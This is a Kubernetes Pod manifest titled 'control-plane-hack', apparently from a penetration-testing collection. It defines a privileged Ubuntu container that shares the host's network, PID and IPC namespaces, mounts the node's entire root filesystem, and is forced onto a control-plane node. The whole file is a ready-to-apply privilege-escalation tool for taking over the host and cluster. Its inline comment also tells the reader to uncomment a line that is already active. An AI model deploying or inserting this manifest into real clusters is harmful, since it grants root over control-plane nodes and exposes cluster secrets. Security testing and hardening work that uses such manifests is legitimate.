apiVersion: v1
kind: Pod
metadata:
  name: control-plane-hack
  labels:
    app: control-plane-hack
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: control-plane-hack
    image: ubuntu
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeName: master-node #k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
  volumes:
  - name: noderoot
    hostPath:
      path: /